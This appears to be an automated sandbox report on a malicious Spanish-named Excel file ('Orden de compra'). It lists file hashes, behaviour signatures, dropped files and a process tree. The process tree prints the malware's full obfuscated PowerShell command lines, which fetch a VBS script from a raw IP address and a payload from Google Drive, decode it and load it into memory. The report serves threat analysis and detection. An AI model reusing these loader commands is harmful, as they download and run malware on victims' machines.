Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    31/10/2024, 09:44

General

  • Target

    Orden de compra.xla.xls

  • Size

    657KB

  • MD5

    1048471113b938176f93411516da0960

  • SHA1

    42711353d0c65d1d7e7b16fceb81d6d23a08d286

  • SHA256

    a3fddc5f8fdb4f125ad3604d28d603947a6ccf1dacbc1fbb910d3c773f70dcbe

  • SHA512

    d2ecacfe828afaf1c41a5f08f9292dfa92f51bb85a47fbb4a9d0a87572c9f48001d352032a4c33c3b7919895ab9db674a1af3f210b36eda6848f86eda9f3a582

  • SSDEEP

    12288:/7dWr5iDaBPSGJ6E30oXeu9rjjYdLXGnJ8eS//9BfXBg8u:cAaBSGDbXeL6S//zfB

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Orden de compra.xla.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3056
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Windows\SysWOW64\wIndOWspOweRsHElL\v1.0\powERshELL.eXE
      "C:\Windows\sYstEM32\wIndOWspOweRsHElL\v1.0\powERshELL.eXE" "pOwerShELL -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE ; IeX($(IeX('[SYSteM.TEXT.encodING]'+[CHAR]58+[cHar]58+'uTF8.GeTStrINg([SYsTEm.ConVERT]'+[CHAR]0x3a+[cHaR]58+'frOMbasE64STriNg('+[chaR]34+'JHlLdEl4amsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVmaW5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0RyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxZEtVLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdFQURoRXFaSyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd1JPVnRsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhTcyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktwY3ZWayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0JvcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeUt0SXhqazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1LjE0OS4yNDEuMTgzL01QRFctY29uc3RyYWludHMudmJzIiwiJGVOVjpBUFBEQVRBXG5lZXRhbmRjbGVhbnRoaW5nc2Zvcmdvb2QudmJzIiwwLDApO1N0QXJ0LXNsRUVQKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxuZWV0YW5kY2xlYW50aGluZ3Nmb3Jnb29kLnZicyI='+[ChAR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1240
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1784
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\atav4f2k.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:436
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D3E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5D3D.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:780
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs"
        3⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2256
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdmRUdpbWFnZScrJ1VybCA9IGVJR2h0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIGVJRztmRUd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2ZFR2ltYWdlQnl0ZXMgPSBmRUd3ZWJDbGllbnQuRG93bmxvYWREYXRhKGZFR2ltYWdlVXJsJysnKTtmRUdpbWEnKydnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhmRUdpbWFnZUJ5dGVzKTtmRUdzdGFydEZsYWcgPSBlSUc8JysnPEJBU0U2NF9TVEFSVD4+ZUlHO2ZFR2VuZEZsYWcgPSBlSUc8JysnPEJBU0U2NF9FTkQ+PmVJRztmRUdzdGFydEluZGV4ID0gZkVHaW1hZ2VUJysnZXh0LkluZGV4T2YoZkVHc3RhcnRGbGFnKTtmRUdlbmRJbmRleCA9IGZFR2ltYWdlVGV4dC5JbmRleCcrJ09mKGZFR2VuZEZsYWcnKycpO2ZFR3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBmRUdlbmRJbmRleCAtZ3QgZkVHc3RhcnRJbmRleCcrJztmRUdzdGFydEluZGV4ICs9IGZFR3N0YXJ0RmxhZy5MZW5ndGg7ZkVHYmFzZTY0TGVuZ3RoID0gZkVHZW5kSW5kZXggLSBmRUdzdGFydEluZGV4O2ZFR2JhcycrJ2U2NENvbW1hbmQgPSBmRUdpbWFnZVRleHQuU3Vic3RyaW5nKGZFR3N0YXJ0SW5kZXgsIGZFR2Jhc2U2NExlbmd0aCk7ZkVHYicrJ2FzZTY0UmV2ZXJzZWQgPSAtam9pbiAoZkVHYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIEhldyBGJysnb3JFYWNoLU9iamVjdCB7IGZFR18nKycgfSlbLTEuLi0oZkVHYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtmRUcnKydjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGJysncm9tQmFzZTY0U3RyaW5nKGZFR2Jhc2U2NFJldmVyc2VkKTtmRUdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoZkVHY29tbWFuZEJ5dGVzKTtmRUd2YWlNZXRob2QgPSBbZG5saWIuSU8uJysnSG9tZV0uR2V0TWV0aG9kKGVJR1ZBSWVJRycrJyk7ZkVHdmFpTWV0aG9kLkludicrJ29rZShmRUdudWxsLCBAKGVJR3R4dC5kJysndWR1ZHVkdWR1RC8zODEuMTQyLjk0MS41NC8vOnB0dGhlSUcsIGVJR2QnKydlc2F0aXZhZG9lSUcsJysnIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR0FkZEluUHJvY2VzczMyZUlHLCBlSScrJ0dkZXNhdGl2YWRvZUlHLCBlSUdkZXNhdGl2YWRvZUlHLGVJR2RlJysnc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUdkZXNhdGl2YWRvZUlHLGVJR2Rlc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUcxZUlHLGVJR2Rlc2F0aXZhZG9lSUcpKTsnKS5SZVBMQUNlKChbQ2hhcl0xMDErW0NoYXJdNzMrW0NoYXJdNzEpLFtTVFJpTmddW0NoYXJdMzkpLlJlUExBQ2UoJ2ZFRycsW1NUUmlOZ11bQ2hhcl0zNikuUmVQTEFDZSgoW0NoYXJdNzIrW0NoYXJdMTAxK1tDaGFyXTExOSksW1NUUmlOZ11bQ2hhcl0xMjQpIHwuKCAkRW52OkNvTXNwRWNbNCwyNiwyNV0tSk9JTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('fEGimage'+'Url = eIGhttps:/'+'/drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur eIG;fEGwebClient = New-Object System.Net.WebClient;fEGimageBytes = fEGwebClient.DownloadData(fEGimageUrl'+');fEGima'+'geText = [System.Text.Encoding]::UTF8.GetString(fEGimageBytes);fEGstartFlag = eIG<'+'<BASE64_START>>eIG;fEGendFlag = eIG<'+'<BASE64_END>>eIG;fEGstartIndex = fEGimageT'+'ext.IndexOf(fEGstartFlag);fEGendIndex = fEGimageText.Index'+'Of(fEGendFlag'+');fEGstartIndex -ge 0 -and fEGendIndex -gt fEGstartIndex'+';fEGstartIndex += fEGstartFlag.Length;fEGbase64Length = fEGendIndex - fEGstartIndex;fEGbas'+'e64Command = fEGimageText.Substring(fEGstartIndex, fEGbase64Length);fEGb'+'ase64Reversed = -join (fEGbase64Command.ToCharArray() Hew F'+'orEach-Object { fEG_'+' })[-1..-(fEGbase64Command.Length)];fEG'+'commandBytes = [System.Convert]::F'+'romBase64String(fEGbase64Reversed);fEGloadedAssembly = [System.Reflection.Assembly]'+'::Load(fEGcommandBytes);fEGvaiMethod = [dnlib.IO.'+'Home].GetMethod(eIGVAIeIG'+');fEGvaiMethod.Inv'+'oke(fEGnull, @(eIGtxt.d'+'ududududuD/381.142.941.54//:pttheIG, eIGd'+'esativadoeIG,'+' eIGdesativadoeIG, eIGdesativadoeIG, eIGAddInProcess32eIG, eI'+'GdesativadoeIG, eIGdesativadoeIG,eIGde'+'sativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIG1eIG,eIGdesativadoeIG));').RePLACe(([Char]101+[Char]73+[Char]71),[STRiNg][Char]39).RePLACe('fEG',[STRiNg][Char]36).RePLACe(([Char]72+[Char]101+[Char]119),[STRiNg][Char]124) |.( $Env:CoMspEc[4,26,25]-JOIN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    67e486b2f148a3fca863728242b6273e

    SHA1

    452a84c183d7ea5b7c015b597e94af8eef66d44a

    SHA256

    facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

    SHA512

    d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    3aafe16555374466063ace2aa215363a

    SHA1

    55f5a19d521cf53be72a3e2efdcd20d350e6f423

    SHA256

    a8290ba202c19258d8b1fd1145f5784eafa9d8f10e52b486ce07dd4cf04c5d82

    SHA512

    694083d90f5038ad3e735d0850c7a6599017eece029c2b6bbb58197de4443d7da18e1580cfba82cfe3512bbae1b953954898c28a15d6cc63251d1b1a9251b488

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    853861f29947f5049783730ad78d99dc

    SHA1

    7210ffb60673ba72ced116a93aab750f2e05e6dc

    SHA256

    8fa3c7f7396623c4ee56e2113fc1d29ba71a7c640fdb5b7b9be948ae00b63e2f

    SHA512

    f457ebc9fe15c1e77400575c20b187015ee531886667e3993b7676392473082a53301db36227ad153605949e4a848b4d16671ab9166e56e78aeadd5126983d93

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\greenthingswithgreatnewsforgetmeback[1].hta

    Filesize

    8KB

    MD5

    c6eae4c9efe3cc3cb25b6d3783dff994

    SHA1

    28fd5a701814a8181b09d4501dcb61a3c83baede

    SHA256

    e2246e47bcd3044b98eba30b9d121115db0d42d2df7a56aea9e547685f7a91a3

    SHA512

    ef63af7f1ef567585c028c9c8492fd845355cc2240cff082c67b92372f1b7e69cd86c7be0656925b8a17912bea41f8f881528fec489d4065969e5f41cc889ee9

  • C:\Users\Admin\AppData\Local\Temp\Cab4579.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES5D3E.tmp

    Filesize

    1KB

    MD5

    a325c042b2f62048a126289c76f327e0

    SHA1

    c9e07c31b88b7ebadf10610ceaae82f216ec3802

    SHA256

    45a38413b25cde453e233e2eda3e0ea51ce7d80c0b4c41d39a2aed09b5562ac5

    SHA512

    e32b254d7cf6602dc7400817670e4f3874564e86f4f4c2d62ef867cfa640cdbda1711dad955b889fcbc708a69c5870bd47069ee814e9f0eca2bf78e0524f8f22

  • C:\Users\Admin\AppData\Local\Temp\atav4f2k.dll

    Filesize

    3KB

    MD5

    4b4d7be430711f640866d3d9796e6c59

    SHA1

    9d6d2b24e59289270fe1ac3c5ba243c8f0b3907e

    SHA256

    856068bd301034943fd5366608ae06de26029883eb9cf5bf7b039b1f8bf918d9

    SHA512

    3471e0bf87f9b732676823f3caad180957bb7151cb3ccc45deeb4c8150cc14c47fa61fe5fd660094517f710b765f66abeccb182635642ec80d46ad83e5c7b653

  • C:\Users\Admin\AppData\Local\Temp\atav4f2k.pdb

    Filesize

    7KB

    MD5

    d50259b1de03cdd9d92b5ad371cac1a2

    SHA1

    b2b1ba4b3da674fedddc411b41c7d5b81de3360e

    SHA256

    b1812495404a15f44fe3b604a960d144861ef56fa71cf6edf983e290a0978996

    SHA512

    3c0d2ef5d49706428a3cf13bf45e8b53deffb51d3bc9e06b08a68b30b6a193bbf716f5ee34214fc8892d2f5b8447a72a4ebac743e55528c68be3edd1b6ae6d48

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    7050c3a50c0accf269a4d9ef9c390da7

    SHA1

    caf319daad68db4029f504c1ab855c67c4aa5f8a

    SHA256

    3cc4bff1687d234ad4b275bae58a04466cdf8dc7c7cd74e2337433e605171c09

    SHA512

    e49cf8bf86f0b3b83d299f9780b6fcdf2cce48df3af117aa581563e47fbf2e36c683cb5ea0995104de2da3269a38b22ee278061c75d3591ec91abd2b06ec6229

  • C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs

    Filesize

    68KB

    MD5

    d27816d0f221aaf7a0362700a3e0a5b4

    SHA1

    390961053e0642b3715262962533550675dbd9b5

    SHA256

    9a81502d5d1efb62ca49e778c4e117b4784ead30b3565e80bdf5139d9ecd7162

    SHA512

    29e68d3d817699d950f6165e199eaa83cb14f9b0238e53d580ee78b2bf2c883370faf389e24b1fae8aded4758d7399a94ead882ad30398ce8cf9fa564796f76e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC5D3D.tmp

    Filesize

    652B

    MD5

    02c102a5dc8be5c7498267c89eb58152

    SHA1

    3db15792e3e6d4583e62be0b581e11e3f419ba2a

    SHA256

    f851c56fcbf9be9adb16d1e048ebd6f966fc80ced846722528c26242caf3d49f

    SHA512

    669643357ba11964e1bdcb07a48bfcc6175a003f407eeb5e4aff3025d3d332f302f92c94b1fbbdfed6a8e79af13421b2a4878e7dab362988e1916babb3123819

  • \??\c:\Users\Admin\AppData\Local\Temp\atav4f2k.0.cs

    Filesize

    467B

    MD5

    d12717d89552ddb8b59a93f6d7b53650

    SHA1

    8141049952e7f42cd8ff2931934515a6b3901135

    SHA256

    90f46741701b8bb295ffb92a94a70d5233d2ec0f4a58941f7c1fa4a8d6a0276c

    SHA512

    42056b6146e8543dd33cc5645c6527264bfb30cc159259dae2beb03fed25aa719d257ad0e4b96ba0a02f59655ccda5bb4865623e093ad3e7dd621bd3d463a19f

  • \??\c:\Users\Admin\AppData\Local\Temp\atav4f2k.cmdline

    Filesize

    309B

    MD5

    58139ee86e1ce46d222d80681287283f

    SHA1

    9bc2635ecb5b044c0710c6aaee5d90ac9cc475e2

    SHA256

    96927c0c1171d6ee2f6b82d87629151722059bab8ecc799be45010222599698f

    SHA512

    1a045ae0e32920ae04d73335fb81d6a39c9a36115e1cf0d21031b4391479f8f294bfeed14d27142297d0db2881e84003eb2a0c84df58ef268c34e7e210c470a2

  • memory/2816-17-0x0000000002640000-0x0000000002642000-memory.dmp

    Filesize

    8KB

  • memory/3056-18-0x0000000002470000-0x0000000002472000-memory.dmp

    Filesize

    8KB

  • memory/3056-1-0x00000000729CD000-0x00000000729D8000-memory.dmp

    Filesize

    44KB

  • memory/3056-32-0x00000000729CD000-0x00000000729D8000-memory.dmp

    Filesize

    44KB

  • memory/3056-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB